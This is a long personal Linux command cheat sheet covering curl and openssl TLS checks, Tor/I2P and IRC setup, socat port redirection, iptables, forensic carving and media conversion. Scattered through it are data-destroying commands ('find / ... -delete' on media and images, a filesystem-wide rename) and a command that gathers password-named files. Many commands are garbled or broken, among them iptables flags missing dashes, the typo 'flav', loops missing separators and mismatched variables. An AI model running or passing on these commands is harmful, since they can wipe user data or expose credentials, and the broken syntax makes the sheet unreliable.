##  [+] Remove the User Agent
##-===============================-##
curl -A '' $Domain


##-==================================-##
##  [+] Send an Empty User Agent
##-==================================-##
curl -A '' -H 'User-Agent;' $Domain


##-===============================-##
##  [+] Save Cookies to a File
##-===============================-##
curl -c cookies.txt $Domain


##-=================================-##
##  [+] Load Cookies from a File
##-=================================-##
curl -b cookies.txt $Domain


##-=================================-##
##  [+] Capture Session Token:
##-=================================-##
wget -q --save-cookies=$Cookie.txt --keep-session-cookies --post-data="username:admin&password=pass&Login=Login" http://$URL/login.php


openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout /etc/apache2/ssl/apache.key -out /etc/apache2/ssl/apache.crt


## ---------------------------------------------- ##
##  [+] Testing connection to the remote host
## ---------------------------------------------- ##
echo | openssl s_client -connect $Domain:443 -showcerts


## ---------------------------------------------------------------- ##
##  [+] Testing connection to the remote host (with SNI support)
## ---------------------------------------------------------------- ##
echo | openssl s_client -showcerts -servername $Domain -connect $Domain:443


## ----------------------------------------------------------------------- ##
##  [+] Testing connection to the remote host with specific ssl version
## ----------------------------------------------------------------------- ##
openssl s_client -tls1_2 -connect $Domain:443


## ----------------------------------------------------------------------- ##
##  [+] Testing connection to the remote host with specific ssl cipher
## ----------------------------------------------------------------------- ##
openssl s_client -cipher 'AES128-SHA' -connect $Domain:443


##-=============================================-##
##   [+] Connect to SMTP server using STARTTLS
##-=============================================-##
openssl s_client -starttls smtp -crlf -connect 127.0.0.1:25
openssl s_client -connect smtp.office365.com:587 -starttls smtp
gnutls-cli-debug --starttls-proto smtp --port 25 localhost


##-=========================================-##
##   [+]
##-=========================================-##
openssl s_client -connect smtp.gmail.com:587 -starttls smtp < /dev/null 2>/dev/null |
openssl x509 -fingerprint -noout -in /dev/stdin | cut -d'=' -f2


##-=========================================-##
##   [+]
##-=========================================-##
openssl s_client -showcerts -starttls smtp -connect smtp_relay:smtp_relay_port < /dev/null 2> /dev/null


##-=========================================-##
##   [+]
##-=========================================-##
sudo -u postfix openssl s_client -showcerts -starttls smtp -connect smtp.gmail.com:587 < /dev/null 2> /dev/null


##-=========================================-##
##   [+]
##-=========================================-##
openssl s_client -CApath /etc/ssl/certs -showcerts -starttls smtp -connect smtp_relay:smtp_relay_port < /dev/null 2> /dev/null


##-=========================================-##
##   [+] secure POP:
##-=========================================-##
openssl s_client -quiet -connect $Domain:995
openssl s_client -crlf -connect server.server.net:110 -starttls pop3


##-=========================================-##
##   [+] secure IMAP:
##-=========================================-##
openssl s_client -quiet -connect $Domain:993
openssl s_client -ssl3 -connect imap.gmail.com:993
gnutls-cli imap.gmail.com -p 993


openssl s_client -showcerts -connect chat.freenode.net:6697


##-=========================================-##
##   [+] Verify the SHA-256 fingerprint:
##-=========================================-##
openssl x509 -in /etc/pki/$File.pem -fingerprint -noout -sha256


##-=========================================================-##
##   [+] verify the XMPP servers certificate fingerprint
##-=========================================================-##
echo -e | openssl s_client -connect $Domain:5222 -starttls xmpp | openssl x509 -noout -fingerprint -sha256 | tr -d ':'


gnutls-cli --crlf --starttls --x509cafile /etc/pki/CA/cacert.pem --port 25 mail.$Domain.com


openssl s_client -host $Host -port 389
openssl s_client -host $Host -port 636


##-============================================-##
##   [+] Connect to LDAP/LDAPS Using CA File:
##-============================================-##
openssl s_client -CAfile /$Dir/$File.pem -host $Host -port 389
openssl s_client -CAfile /$Dir/$File.pem -host $Host -port 636

openssl s_client -connect $Host:$Port -starttls LDAP

openssl s_client -connect ldap.$Host:389
openssl s_client -connect ldap.$Host:636


##-=================================-##
##   [+] Dump LDAP/LDAPS To File:
##-=================================-##
tcpdump port 389 -w $File.pcap
tcpdump port 636 -w $File.pcap


##-=========================================-##
##   [+] Creating a Certificate Request
##-=========================================-##
openssl req -config /etc/mail/certs/mailCA/openssl.cnf -new -nodes -days 1095 -keyout $Domain.key.pem -out $Domain.csr.pem


##-=========================================-##
##   [+] Signing Your Certificate Request
##-=========================================-##
openssl ca -config /etc/mail/certs/mailCA/openssl.cnf -policy policy_anything -out $Domain.cert.pem -infiles $Domain.csr.pem


##-========================================-##
##  [+] Generate multidomain certificate
##-========================================-##
certbot certonly -d $Domain -d $Domain


##-======================================-##
##  [+] Generate wildcard certificate
##-======================================-##
certbot certonly --manual --preferred-challenges=dns -d $Domain -d *.$Domain


##-======================================================-##
##  [+] Generate certificate with 4096 bit private key
##-======================================================-##
certbot certonly -d $Domain -d $Domain --rsa-key-size 4096


##-======================================-##
##   [+]
##-======================================-##
stunnel -cr $Site.com:443


## ----------------------------------------------------------------------------- ##
##   [?] tor-gencert - Generate certs and keys For Tor directory authorities
## ----------------------------------------------------------------------------- ##
##   [?] Tor directory authorities running the v3 Tor directory protocol,
## ----------------------------------------------------------------------------- ##
##   [?] Every directory authority has a long term authority identity key
##   [?] (which is distinct from the identity key it uses as a Tor server);
##   [?] this key should be kept offline in a secure location.
## ----------------------------------------------------------------------------- ##


##-======================================-##
##   [+] Generate a new identity key:
##-======================================-##
tor-gencert --create-identity-key


##-======================================================-##
##   [+] Read the identity key from the specified file:
##-======================================================-##
##   [?] Default: "./authority_identity_key"
## ------------------------------------------------------ ##
tor-gencert -i $File


##-=====================================================-##
##   [+] Write the signing key to the specified file:
##-=====================================================-##
##   [?] Default: "./authority_signing_key"
## ----------------------------------------------------- ##
tor-gencert -s $File


##-=====================================================-##
##   [+] Write the certificate to the specified file:
##-=====================================================-##
##   [?] Default: "./authority_certificate"
## ----------------------------------------------------- ##
tor-gencert -c $File


##-======================================-##
##   [+]
##-======================================-##
i2prouter start


##-======================================-##
##   [+]
##-======================================-##
sudo -u i2psvc i2prouter start
sleep 2


##-======================================-##
##   [+]
##-======================================-##
xdg-open
xdg-open http://127.0.0.1:7657/home


##-======================================-##
##   [+]
##-======================================-##
kill -INT $( cat /var/run/i2pd/i2pd.pid )


##-======================================-##
##   [+]
##-======================================-##
iptables -A OUTPUT -m owner --uid-owner $TorUID -j ACCEPT
iptables -A OUTPUT -j REJECT


##-======================================-##
##   [+]
##-======================================-##
tor_uid="$(id -u debian-tor)"


##-======================================-##
##   [+]
##-======================================-##
curl -s -m 10 --socks5 "$hostport" --socks5-hostname "$hostport" -L "$url"


##-===================================================================-##
##   [+] Curl - Tor SOCKS5 Proxy - Secure TLS - Firefox User Agent
##-===================================================================-##
curl --proxy "socks5h://localhost:9050" --tlsv1.2 --compressed --user-agent "Mozilla/5.0 (Windows NT 6.1; rv:45.0) Gecko/20100101 Firefox/45.0" -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H 'DNT: 1' $URL


echo "## ########################################## ###"
echo "##    ##"
echo "## ########################################## ###"
/ignore * CTCPS

echo "## ########################################## ###"
echo "##    ##"
echo "## ########################################## ###"
/ignore * DCC


## ---------------------------------------------------------------------------- ##
     /OTR gen                               ## Generate OTR Keys
     /OTR genkey $Nick@irc.$Server.net      ## Generate OTR Keys For $Server
## ---------------------------------------------------------------------------- ##
     /OTR start                             ## Starts an OTR chat
     /OTR finish $Nick                      ## Finish an OTR chat
## ---------------------------------------------------------------------------- ##
     /OTR trust $Nick                       ## Trusts the other user
     /OTR auth $Nick $Pass                  ## Auths a user via password
## ---------------------------------------------------------------------------- ##


~/.config/hexchat/
~/.config/hexchat/certs/
~/.config/hexchat/ignore.conf
~/.config/hexchat/hexchat.conf


/ignore *!*@* CTCP DCC
/ignore * CTCP DCC
/ignore * CTCPS
/ignore * DCC
/ignore * CTCP DCC
/set identd OFF
/set dcc_auto_chat 0
/set dcc_auto_resume OFF

/set net_proxy_host 10.8.0.1
/set net_proxy_port 1080
/set net_proxy_type 3
/set irc_user_name xe1phix
/set irc_nick1 parrotsec-kiosk


## ################################################################################################## ##
## =============================== Beginning of I2p Irc2p Topic ===================================== ##
## ################################################################################################## ##


## ===================================================================================== ##

## ===================================================================================== ##
##                      KillYourTV I2P IRC (IRC2P Protocol) Server
## ===================================================================================== ##


## ---------------------------------------------------------------------------------- ##
/join channel #irc2p
## ---------------------------------------------------------------------------------- ##
KillYourTV / kytv on irc.oftc.net
Killyourtv on irc.oftc.net
KillYourTV on irc.killyourtv.i2p
killyourtv / kytv on irc.freenode.net
KillYourTV on irc.postman.i2p
## ---------------------------------------------------------------------------------- ##


## ===================================================================================== ##
##                      Other I2P IRC (IRC2P Protocol) Servers
## ===================================================================================== ##

## Irc2P                            [[ xdg-open http://127.0.0.1:6668   ]]  ## IRC tunnel to access the Irc2P network
## Postman Irc2p IRC Server         [[   hexchat irc.postman.i2p:6667   ]]  ##
## Echelons Irc2p IRC Server        [[   hexchat irc.echelon.i2p:6667   ]]  ##


##-=========================================-##
##   [+]
##-=========================================-##
/server add freenode chat.freenode.net/6697 -ssl
/connect chat.freenode.net/6697 -ssl


##-=========================================-##
##   [+]
##-=========================================-##
/set weechat.network.gnutls_ca_file "/etc/ssl/certs/ca-certificates.crt"


##-=========================================-##
##   [+]
##-=========================================-##
/server add NAME HOST/6667 -autoconnect -ssl -ssl_dhkey_size=512 -password=PASSWORD -username=USERNAME -nicks=NICK


~/.config/hexchat/certs/
##-=========================================-##
##   [+]
##-=========================================-##
openssl req -x509 -newkey rsa:4096 -sha256 -days 365 -nodes -keyout Certificate.key -out Certificate.crt


##-=========================================-##
##   [+]
##-=========================================-##
cat Certificate.crt Certificate.key > Certificate.pem
rm Certificate.crt Certificate.key


##-=========================================-##
##   [+] Register your fingerprint
##      (append FINGERPRINT if on Rizon):
##-=========================================-##
/msg NickServ cert add
/msg NickServ CERT LIST
/msg NickServ CERT ADD


sed -i 's/^\(net_proxy_type =\) 3$/\1 0/'     /home/anon/config/hexchat/hexchat.conf
sed -i 's/^\(dcc_ip_from_server =\) 0$/\1 1/' /home/anon/config/hexchat/hexchat.conf
sed -i 's/browser\.html/browser-noanon.html/'  /home/anon/config/firefox/profile.anon/prefs.js


Tor Browser without Tor


/home/parrotsec-kiosk/Downloads/Xe1phix-ParrotKiosk-Production-v2/Xe1phix-Firefox-Hardening/Xe1phix-User.js/FirefoxHardened-UserJsSetup-v4.7.sh
/home/parrotsec-kiosk/Downloads/Xe1phix-ParrotKiosk-Production-v2/Xe1phix-Firefox-Hardening/Xe1phix-TorBrowser/Xe1phix-TorBrowser-Setup-v4.3.sh


## Clone The Firefox Hardening Projects Github Repository:
git clone https://github.com/pyllyukko/user.js


##-===========================-##
##    [+]  SSH over HTTP (Squid)
##-===========================-##
socat TCP-L:9999,fork,reuseaddr PROXY:192.168.1.41:127.0.0.1:22,proxyport=3128
ssh $User@127.0.0.1 -p 9999


##-=========================-##
##    [+]  TCP Port Redirection
##-=========================-##
socat TCP-LISTEN:80,fork TCP:<remote host>:80
socat TCP-LISTEN:443,fork TCP:<remote host>:443


##-=========================-##
##    [+]  UDP Port Redirection
##-=========================-##
socat udp4-recvfrom:53,reuseaddr,fork udp4-sendto:$IPAddress>; echo -ne


##-===========================================-##
##   [+] print a specific line from a file
##-===========================================-##
awk 'FNR==5' $File


##-==============================================-##
##   [+] List your largest installed packages
##-==============================================-##
sed -ne '/^Package: \(.*\)/{s//\1/;h;};/^Installed-Size:  \(.*\)/{s//\1/;G;s/\n/ /;p;}' /var/lib/dpkg/status | sort -rn


##-======================================-##
##   [+]
##-======================================-##
irc_hide_version = 1


##-======================================-##
##   [+]
##-======================================-##
keyscan $Cert.pem $File.bin


##-====================================================================-##
##  [+] Ban all IPs that attempted to access phpmyadmin on your site
##-====================================================================-##
grep "phpmyadmin" /var/log/access.log | grep -Po "^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}" | sort | uniq | xargs -I% sudo iptables -A INPUT -s % -j DROP


##-===========================================================-##
##  [+] Block known dirty hosts from reaching your machine
##-===========================================================-##
wget -qO - http://infiltrated.net/blacklisted|awk '!/#|[a-z]/&&/./{print "iptables -A INPUT -s "$1" -j DROP"}'


##-==============================================================-##
##  [+] Retrieve dropped connections from firewalld journaling
##-==============================================================-##
journalctl -b | grep -o "PROTO=.*" | sed -r 's/(PROTO|SPT|DPT|LEN)=//g' | awk '{print $1, $3}' | sort | uniq -c


##-=========================-##
##   [+] Logger Services
##-=========================-##
logger -t "($(basename ))" $$ SERVICES-START being started....


tail -F /var/log/openvpn.log

lsof -Pni | grep


##-=================================================-##
##   [+] Count processes related to HTTP server
##-=================================================-##
ps aux | grep http | grep -v grep | wc -l


##-=================================================-##
##   [+] Display top 5 processes consuming CPU
##-=================================================-##
ps -eo pcpu,user,pid,cmd | sort -r | head -5


##-========================================================================-##
##   [+] Display the top ten running processes - sorted by memory usage
##-========================================================================-##
ps aux | sort -nk +4 | tail


##-=================================================-##
##   [+]
##-========================================================================-##
sysctl -w net.ipv4.ip_forward=1
iptables-save | sudo tee /etc/iptables/rules.v4

ipset list

/var/lib/ipset/rules-save
ipset save > "${IPSET_SAVE}"
ipset restore < "${IPSET_SAVE}"


ipset save > /etc/iptables/ipset.v4
ipset restore < /etc/iptables/ipset.v4
iptables-save > /etc/iptables/rules.v4
iptables-restore < /etc/iptables/rules.v4
ip6tables-restore < /etc/iptables/rules.v6

chmod 0640 /etc/iptables/rules.v4


if [ ! -f /proc/net/ip6_tables_names ]; then
        echo " skipping IPv6 (no modules loaded)"
elif [ -x /sbin/ip6tables-save ]; then
        touch /etc/iptables/rules.v6
        chmod 0640 /etc/iptables/rules.v6
        ip6tables-save > /etc/iptables/rules.v6


 linux vpn auto reconnect

nmcli connection modify <Your VPN connection name> vpn.persistent yes


/var/log/fail2ban.log


iptables A INPUT p TCP dport 22 j ULOG ulogprefix "SSH connection attempt: "


conntrackd -C /etc/conntrackd/conntrackd.conf


ulogd --daemon --uid ulog --pidfile /run/ulog/ulogd.pid


--verbose
--loglevel
--configfile
--info


--daemon


    do
        f_iptrule "-D" "${ban_chain} -i ${dev} -m conntrack --ctstate NEW -m set --match-set ${src_name} src -j ${target_src}"
        f_iptrule "-D" "${ban_chain} -o ${dev} -m conntrack --ctstate NEW -m set --match-set ${src_name} dst -j ${target_dst}"
    done


# Mount folder/filesystem through SSH
sshfs name@server:/path/to/folder /path/to/mount/point

# Mount a temporary ram partition
mount -t tmpfs tmpfs /mnt -o size=1024m


tmpfs   /home/username/.cache   tmpfs   noatime,nodev,nosuid,size=400M  0   0


##-=====================================================-##
##   [+] ASCII string search and list the byte offset
##-=====================================================-##
srch_strings -t d $File.dd > $File.ascii.str


##-===================================================-##
##   [+] uNICODE string search and list byte offset
##-===================================================-##
srch_strings -e l –t d $File.dd > $File.uni.str


##-=========================-##
##   [+] Steganography
##-=========================-##
steghide extract -sf $File.jpg
steghide info $File.jpg


##-============================================================-##
##   [+] Create unallocated Image (deleted data) using blkls
##-============================================================-##
blkls $imagefile.dd > $unallocated_imagefile.blkls


##-========================================================-##
##   [+] Create Slack Image Using dls (for FAT and NTFS)
##-========================================================-##
blkls -s $imagefile.dd > $imagefile.slack


##-===============================================================-##
##   [+] Foremost Carves out files based on headers and footers
##-===============================================================-##
foremost -o $outputdir -c /etc/foremost.conf $File.img


##-===================================================================-##
##   [+] Sigfind - search for a binary value at a given offset (-o)
##-===================================================================-##
sigfind $hexvalue -o $offset $File.img


zipdetails


zipcloak -

zip_stat (3)         - get information about file

encrypt entries in a zipfile
zipdetails (1)       - display the internal structure of zip files
zipgrep (1)          - search files in a ZIP archive for lines matching a pattern
zipinfo (1)          - list detailed information about a ZIP archive


ffmpeg -i contaminated.mov -acodec copy -vcodec copy clean.mov


##-===================================================================-##
##   [+]
##-=============================================================-##
ffmpeg -i $File.mp4 -map 0 -map_metadata 0:5:0 -c copy $File.mp4


##-===================================================================-##
##   [+]
##-=============================================================-##
ffmpeg -i $File.mov -acodec copy -vcodec copy $File.mov


##-=======================================================================-##
##   [+] Convert a MOV captured from a digital camera to a smaller AVI
##-=======================================================================-##
ffmpeg -i $File.mov -b 4096k -vcodec msmpeg4v2 -acodec pcm_u8 $File.avi


##-===================================================================-##
##   [+]
##-=======================================================================-##
ffmpeg -v info -i stego.mp3 -f null     ## to recode the file and throw away the result


##-=====================================-##
##   [+] Rip audio from a video file.
##-=====================================-##
mplayer -ao pcm -vo null -vc dummy -dumpaudio -dumpfile $OutFile $InFile


##-=======================================================-##
##   [+] Record a screencast and convert it to an mpeg
##-=======================================================-##
ffmpeg -f x11grab -r 25 -s 800x600 -i :0.0 $File.mpg


##-==========================================-##
##   [+] Capture video of a linux desktop
##-==========================================-##
ffmpeg -y -f alsa -ac 2 -i pulse -f x11grab -r 30 -s `xdpyinfo | grep 'dimensions:'|awk '{print $2}'` -i :0.0 -acodec pcm_s16le $File.wav -an -vcodec libx264 -vpre lossless_ultrafast -threads 0 output.mp4


##-============================================================-##
##   [+] Convert all .flac from a folder subtree In 320Kb mp3
##-============================================================-##
find . -type f -iname '*.flac' | while read FILE; do FILENAME="${FILE%.*}"; flac -cd "$FILE" | lame -b 320 - "${FILENAME}.mp3"; done


# Dumping Audio stream from flv (using ffmpeg)
ffmpeg -i <filename>.flv -vn <filename>.mp3


# Edit video by cutting the part you like without transcoding.
mencoder -ss <start point> -endpos <time from start point> -oac copy -ovc copy <invid> -o <outvid>


##-============================================================-##
##   [+] Substitute audio track of video file using mencoder
##-============================================================-##
mencoder -ovc copy -audiofile $File.mp3 -oac copy $File.avi -o $File.avi


##-=====================================================-##
##   [+] Remove sound from video file using mencoder
##-=====================================================-##
mencoder -ovc copy -nosound $File.avi -o $File.avi


##-========================================-##
##   [+] Concatenate (join) video files
##-========================================-##
mencoder -forceidx -ovc copy -oac copy -o $OutFile.avi $File1.avi $File2.avi


##-================================-##
##   [+] Android PNG screenshot

adb pull /dev/graphics/fb0 /dev/stdout | ffmpeg -vframes 1 -vcodec rawvideo -f rawvideo -pix_fmt rgb32 -s 480x800 -i pipe:0 -f image2 -vcodec png screenshot.png


##-===============================================-##
##   [+] Stream YouTube URL directly to mplayer
##-===============================================-##
mplayer -fs -cookies -cookies-file /tmp/cookie.txt
youtube-dl -g --cookies /tmp/cookie.txt "http://www.youtube.com/watch?v=$VideoID"


##-======================================-##
##   [+]
##-======================================-##
cdrecord -scanbus
cdrecord dev=ATA; -scanbus


##-======================================-##
##   [+]
##-======================================-##
cdparanoia -B                   ## Rip CD


##-======================================-##
##   [+]
##-======================================-##
dvdrecord -dao speed=2 dev=ATA:1,0,0 $File.iso
mkisofs -dev-video -udf -o $File.iso $Dir/


##-======================================-##
##   [+]
##-======================================-##
cdrao write --device /dev/sr0 $File.cue


##-==========================================-##
##   [+] burn an ISO image to writable CD

wodim cdimage.iso


##-===================================-##
##   [+] erase content from a cdrw
##-===================================-##
cdrecord -v -blank=all -force


##-=================================================-##
##   [+] Record MP3 audio via ALSA using ffmpeg
##-=================================================-##
ffmpeg -f alsa -ac 2 -i hw:1,0 -acodec libmp3lame -ab 96k $File.mp3


##-========================================================================-##
##   [+] Print a list of the 30 last modified mp3s sorted by last first
##-========================================================================-##
find ~/$Dir -daystart -mtime -60 -name *mp3 -printf "%T@\t%p\n" | sort -f -r | head -n 30 | cut -f 2


##-===================================-##
##   [+] convert wav files to flac
##-===================================-##
flac --best *.wav


##-=================================================================-##
##  [+] Convert all flac files in dir to mp3 320kbps using ffmpeg
##-=================================================================-##
for FILE in *.flac; do ffmpeg -i "$FILE" -b:a 320k "${FILE[@]/%flac/mp3}"; done;


flac --decode $File.flac $File.wav
flav $File.wav $File.flac


lame --decode $File.mp3 $File.wav
lame -b 128 -B 256 --vbr-new $File.wav $File.mp3
lame -b 192 $File.wav $File.mp3


oggenc -b 256 $File.wav


sox $File.wav -c 2 $File.wav


sox $File.wav -r 44100 $File.wav resample       ## Resample WAV file to a 44.1 kHz sample rate


rec -t .wav $File.wav
rec -r 44100 $File.wav
rec -r 44100 -c 2 $File.wav

id3ed -s "" -n "" -a "" $File.mp3
id3v2 --TOAL "$Name" $Name.mp3

##-====================================================================-##
##   [+] Using mplayer to play the audio only but suppress the video
##-====================================================================-##
mplayer -novideo something.mpg


mplayer -fs dvd://
mplayer -sub $File.sub $File.avi
mplayer -monitoraspect 5:3

mplayer -dvd-device $Dir
mplayer $File.iso
mplayer -vo help

mplayer -vf cropdetect
mplayer crop=480:416:0:80
aa:width=250:height=80


mplayer dvd:// -ss


mplayer rtsp://site.com/steam
mplayer url -dumpsteam -dumpfile $File
mplayer /dev/video0
cat /dev/video0 > $File.mpg
mencoder dvd:// -i $File.avi -ovc lac -lavcopts vcodec=mpeg4:vhq:vbitrate=1800 -oac mp3lame -lameopts cbr:vol=3 -aid 128


##-======================================-##
##   [+]
##-======================================-##
tcprobe -i $File.mp3


##-======================================-##
##   [+]
##-======================================-##
locate -i *.mp3
locate -i -r '\.(mp3|ogg|wav)$'


##-======================================-##
##   [+]
##-======================================-##
find / iname "*.mp3"
find / -iregex '.*\.\(mp3\|ogg\|wav\)$'
find ~ -iname ".mp3"
find ~/mp3/ -iname '*.mp3' -exec mv "{}" /tmp/ \;

    find / -name '*.mp3' -type f -delete
    find / -name '*.mov' -type f -delete
    find / -name '*.mp4' -type f -delete
    find / -name '*.avi' -type f -delete
    find / -name '*.mpg' -type f -delete
    find / -name '*.mpeg' -type f -delete
    find / -name '*.flac' -type f -delete
    find / -name '*.m4a' -type f -delete
    find / -name '*.flv' -type f -delete
    find / -name '*.ogg' -type f -delete
    find /home -name '*.gif' -type f -delete
    find /home -name '*.png' -type f -delete
    find /home -name '*.jpg' -type f -delete
    find /home -name '*.jpeg' -type f -delete


find /$Dir/ -name "*.doc" -type f -exec mv {} "/$Dir/Documents/" \;
find /$Dir/ -name "*.docx" -type f -exec mv {} "/$Dir/Documents/" \;
find /$Dir/ -name "*.odt"  -type f -exec mv {} "/$Dir/Documents/" \;
find /$Dir/ -name "*.pdf"  -type f -exec mv {} "/$Dir/Pdfs/" \;
find /$Dir/ -name "*.mbox" -type f -exec mv {} "/$Dir/Mbox/"  \;
find /$Dir/ -name "*.png"  -type f -exec mv {} "/$Dir/Images/" \;
find /$Dir/ -name "*.jpg"  -type f -exec mv {} "/$Dir/Images/" \;
find /$Dir/ -name "*.jpeg" -type f -exec mv {} "/$Dir/Images/" \;
find /$Dir/ -name "*.gif"  -type f -exec mv {} "/$Dir/Images/" \;
find /$Dir/ -name "*.avi"  -type f -exec mv {} "/$Dir/Videos/" \;
find /$Dir/ -name "*.mpeg" -type f -exec mv {} "/$Dir/Videos/" \;
find /$Dir/ -name "*.mp4"  -type f -exec mv {} "/$Dir/Videos/" \;
find /$Dir/ -name "*.mkv"  -type f -exec mv {} "/$Dir/Videos/" \;
find /$Dir/ -name "*.webm" -type f -exec mv {} "/$Dir/Videos/" \;
find /$Dir/ -name "*.wmv"  -type f -exec mv {} "/$Dir/Videos/" \;
find /$Dir/ -name "*.flv"  -type f -exec mv {} "/$Dir/Videos/" \;
find /$Dir/ -name "*.mp3"  -type f -exec mv {} "/$Dir/Sound/" \;
find /$Dir/ -name "*.wav"  -type f -exec mv {} "/$Dir/Sound/" \;
find /$Dir/ -name "*.deb"  -type f -exec mv {} "/$Dir/Debians/" \;
find /$Dir/ -name "*.bin"  -type f -exec mv {} "/$Dir/binaries/" \;
find /$Dir/ -name "*.exe"  -type f -exec mv {} "/$Dir/exe/" \;
find /$Dir/ -name "*.rpm"  -type f -exec mv {} "/$Dir/rpms/" \;
find /$Dir/ -name "*.conf"  -type f -exec mv {} "/$Dir/conf_files" \;
find /$Dir/ -name "*.iso"  -type f -exec mv {} "/$Dir/ISO/" \;
find /$Dir/ -name "*.xls"  -type f -exec mv {} "/$Dir/Excel/" \;
find /$Dir/ -name "*.xlsx" -type f -exec mv {} "/$Dir/Excel/" \;
find /$Dir/ -name "*.csv"  -type f -exec mv {} "/$Dir/Excel/" \;
find /$Dir/ -name "*.ods"  -type f -exec mv {} "/$Dir/Excel/" \;
find /$Dir/ -name "*.ppt"  -type f -exec mv {} "/$Dir/Presentation/" \;
find /$Dir/ -name "*.pptx" -type f -exec mv {} "/$Dir/Presentation/" \;
find /$Dir/ -name "*.odp"  -type f -exec mv {} "/$Dir/Presentation/" \;
find /$Dir/ -name "*.html" -type f -exec mv {} "/$Dir/Web_Files/" \;
find /$Dir/ -name "*.htm"  -type f -exec mv {} "/$Dir/Web_Files/" \;
find /$Dir/ -name "*.jsp"  -type f -exec mv {} "/$Dir/Web_Files/" \;
find /$Dir/ -name "*.xml"  -type f -exec mv {} "/$Dir/Web_Files/" \;
find /$Dir/ -name "*.css"  -type f -exec mv {} "/$Dir/Web_Files/" \;
find /$Dir/ -name "*.js"   -type f -exec mv {} "/$Dir/Web_Files/" \;
find /$Dir/ -name "*.zip"  -type f -exec mv {} "/$Dir/Archives/" \;
find /$Dir/ -name "*.tar"  -type f -exec mv {} "/$Dir/Archives/" \;
find /$Dir/ -name "*.rar"  -type f -exec mv {} "/$Dir/Archives/" \;
find /$Dir/ -name "*.gzip" -type f -exec mv {} "/$Dir/Archives/" \;
find /$Dir/ -name "*.tar.gz" -type f  -exec mv {} "/$Dir/Archives/" \;
find /$Dir/ -name "*.7z"   -type f -exec mv {} "/$Dir/Archives/" \;
find /$Dir/ -name "*.bz"   -type f -exec mv {} "/$Dir/Archives/" \;
find /$Dir/ -name "*.bz2"  -type f -exec mv {} "/$Dir/Archives" \;
find /$Dir/ -name "*.*"    -type f -exec mv {} "/$Dir/Others/" \;


##-======================================-##
##   [+]
##-======================================-##
for i in *.wav; do oggenc -b 192 $i; done;


##-======================================-##
##   [+]
##-======================================-##
for i in *.wav; do j=`echo$i | sed -e 's/\.wav/.mp3/'`; lame -b 192 $i $j done;


##-======================================-##
##   [+]
##-======================================-##
for file in *.mp3; do mv "${file%.txt}{.txt,.xml}"; done


##-==============================================-##
##   [+] Sort movies by length, longest first
##-==============================================-##
for i in *.avi; do echo -n "$i:";totem-gstreamer-video-indexer $i | grep DURATION | cut -d "=" -f 2 ; done | sort -t: -k2 -r


##-=============================================================-##
##   [+] Convert filenames in current directory to lowercase
##-=============================================================-##
find / -depth -exec rename 's/(.*)\/([^\/]*)/$1\/\L$2/' {} \;


## ------------------------------------------------------- ##
##   [?] Replace spaces in filenames with underscores
## ------------------------------------------------------- ##
rename 's/ /_/g' *


# Remove comments from files
sed -e '/^#/d' -e 's/#.*$//' in

# Print all lines between two line numbers
awk 'NR >= 3 && NR <= 6' /path/to/file


##-===============================-##
##   [+] Bash Pause Function:
##-===============================-##
read -p "Press enter to continue.."


## ---------------------------------------------------------- ##
##   [?] Capitalize first letter of each word in a string
## ---------------------------------------------------------- ##
read -ra words <<< "<sentence>" && echo "${words[@]^}"


# Grab a list of MP3s out of Firefoxs cache
for i in `ls ~/.mozilla/firefox/*/Cache`; do file $i | grep -i mpeg | awk '{print $1}' | sed s/.$//; done


# embed referred images in HTML files
grep -ioE "(url\(|src=)['\"]?[^)'\"]*" a.html | grep -ioE "[^\"'(]*.(jpg|png|gif)" | while read l ; do sed -i "s>$l>data:image/${l/[^.]*./};base64,`openssl enc -base64 -in $l| tr -d '\n'`>" a.html ; done;

# Extract title from HTML files
awk 'BEGIN{IGNORECASE=1;FS="<title>|</title>";RS=EOF} {print $2}' file.html

# nice disk usage, sorted by size, see description for full command
du -sk ./* | sort -nr

# Sort the size usage of a directory tree by gigabytes, kilobytes, megabytes, then bytes.
dh() { du -ch --max-depth=1 "${@-.}"|sort -h }


# Mouse Tracking
while true; do xdotool getmouselocation | sed 's/x:\(.*\) y:\(.*\) screen:.*/\1, \2/' >> ./mouse-tracking; sleep 10; done

# get xclip to own the clipboard contents
xclip -o -selection clipboard | xclip -selection clipboard

# List the size (in human readable form) of all sub folders from the current location
du -sch ./*

# Analyse compressed Apache access logs for the most commonly requested pages
zcat access_log.*.gz | awk '{print $7}' | sort | uniq -c | sort -n | tail -n 20

# Find pages returning 404 errors in apache logs
awk '$9 == 404 {print $7}' access_log | uniq -c | sort -rn | head


# Send a local file via email
mutt your@email_address.com -s "Message Subject Here" -a attachment.jpg </dev/null


Find and copy files

find / -iname "passw" -print0 | xargs -I {} cp {} /new/path
find / -iname "passw" | xargs -I {} cp {} /new/path


# Find jpeg images and copy them to a central location
find . -iname "*.jpg" -print0 | tr '[A-Z]' '[a-z]' | xargs -0 cp --backup=numbered -dp -u --target-directory {location} &


tagmp3 set "%A:Pink Floyd %a:The Wall %t? %T?" *.mp3


tagmp3 move "/home/foo/mp3/%A/%a/%T-%t.mp3" *.mp3

tagmp3 move "%A-%t.mp3" *.mp3


# See your current RAM frequency
/usr/sbin/dmidecode | grep -i "current speed"


# List your largest installed packages.
dpkg --get-selections | cut -f1 | while read pkg; do dpkg -L $pkg | xargs -I'{}' bash -c 'if [ ! -d "{}" ]; then echo "{}"; fi' | tr '\n' '\000' | du -c --files0-from - | tail -1 | sed "s/total/$pkg/"; done

# print crontab entries for all the users that actually have a crontab
for USER in `cut -d ":" -f1 </etc/passwd`; do crontab -u ${USER} -l 1>/dev/null 2>&1; if [ ! ${?} -ne 0 ]; then echo -en "--- crontab for ${USER} ---\n$(crontab -u ${USER} -l)\n"; fi; done


# Execute a command at a given time
echo "ls -l" | at midnight


# An alarm clock using xmms2 and at
at 6:00 <<< "xmms2 play"


##-===========================================-##
##   [+] show top 10 process eating memory
##-===========================================-##
alias psmem='ps auxf | sort -nr -k 4 | head -10'


##-=========================================-##
##   [+] show top 10 process eating CPU
##-=========================================-##
alias pscpu='ps auxf | sort -nr -k 3 | head -10'


##-=============================-##
##   [+] Convert PDF to JPG
##-=============================-##
for file in `ls *.pdf`; do convert -verbose -colorspace RGB -resize 800 -interlace none -density 300 -quality 80 $File `echo $File | sed 's/\.pdf$/\.jpg/'`; done


# Merge PDFs into single file
gs -q -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=$File.pdf $File.pdf $File.pdf ...


convert -verbose -size

##-========================================================-##
